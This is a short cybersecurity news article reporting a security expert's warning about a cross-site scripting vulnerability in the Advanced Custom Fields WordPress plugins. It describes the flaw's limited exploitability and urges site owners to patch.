WordPress is suffering from a glitch, potentially jeopardizing up to two million websites that use the hosting service, a cybersecurity expert has warned.
Graham Cluley posted an update on his blog on May 5th, warning that the plugin vulnerability could leave multiple websites open to cross-site scripting (XSS) attacks.
These occur when an unscrupulous hacker injects malicious coding or scripts into an otherwise benign code used by an app or website.
“Millions of WordPress-powered websites are using the Advanced Custom Fields and Advanced Custom Fields Pro plugins, which security researchers say have been vulnerable to cross-site scripting (XSS) attacks,” said Cluley.
He added that this “high severity vulnerability” could be used by a “malicious hacker” to inject code into redirects, adverts, and other HTML content used by websites that would then target users visiting the infected website.
Cluley added that the glitch severity was “somewhat mitigated” by its reliance on social engineering, essentially when a bad actor dupes another computer user into clicking on a malicious link.
“It could only be exploited by logged-in users who had access to the vulnerable plugin, meaning that a non-logged-in attacker would have to trick someone who was logged in with the appropriate privileges to visit a malicious URL to trigger an attack,” said Cluley.
He added: “Although that is clearly much better than if the attack could be initiated by anyone accessing the website, it’s still important that affected sites are patched promptly.”
Cluley credited security researcher Rafie Muhammad for discovering the XSS bug three days previously.
More from Cybernews:
Microsoft to charge for Teams to alleviate EU concerns
NextGen data breach leaves a million at risk
Privacy alert: US airport gets self-serve biometric screeners
No jail for Uber security chief convicted in 2016 hack
Pro-Russian group knocks out French Senate’s website
Subscribe to our newsletter
Your email address will not be published. Required fields are markedmarked